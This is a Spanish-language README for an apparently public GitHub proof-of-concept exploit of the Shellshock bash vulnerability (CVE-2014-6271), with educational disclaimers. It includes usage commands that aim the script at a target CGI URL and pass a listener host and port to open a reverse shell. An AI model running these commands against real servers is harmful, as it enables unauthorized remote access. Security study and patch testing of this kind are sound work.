
Exploit de Shellshock (CVE-2014-6271)
Este repositorio contiene un exploit para una vulnerabilidad que afecta a sistemas basados en Unix. Ten en cuenta que esto es meramente un script de prueba de concepto creado con fines educativos y debe usarse de manera responsable.
Este exploit está diseñado para demostrar cómo funciona el ataque Shellshock y cómo podría usarse para obtener acceso a un shell en un sistema a través de un encabezado de solicitud maliciosamente elaborado.
Este repositorio está destinado únicamente a fines educativos. No uses este código ni ninguna información contenida en él con fines maliciosos. Siempre sigue las pautas éticas y respeta la ley.
Uso:
python3 shellshock.py [URL vulnerable] [LHOST] [LPORT]
Ejemplo:
python3 shellshock.py http://vulnerablewebsite.com/cgi-bin/test.cgi 109.876.654.321 1234
Requisitos previos:
Clona este repositorio en tu máquina local.
git clone https://github.com/AlissonFaoli/Shellshock.git
Navega al directorio del proyecto.
cd Shellshock
Ejecuta el script shellshock.py.
python3 shellshock.py http://vulnerable-website.com/cgi-bin/test.cgi listening_interface_IP listening_port
Este exploit se publica bajo la Licencia MIT. Puedes encontrar más información al respecto en el archivo LICENSE.
Si tienes alguna pregunta o inquietud sobre este exploit, no dudes en contactar al autor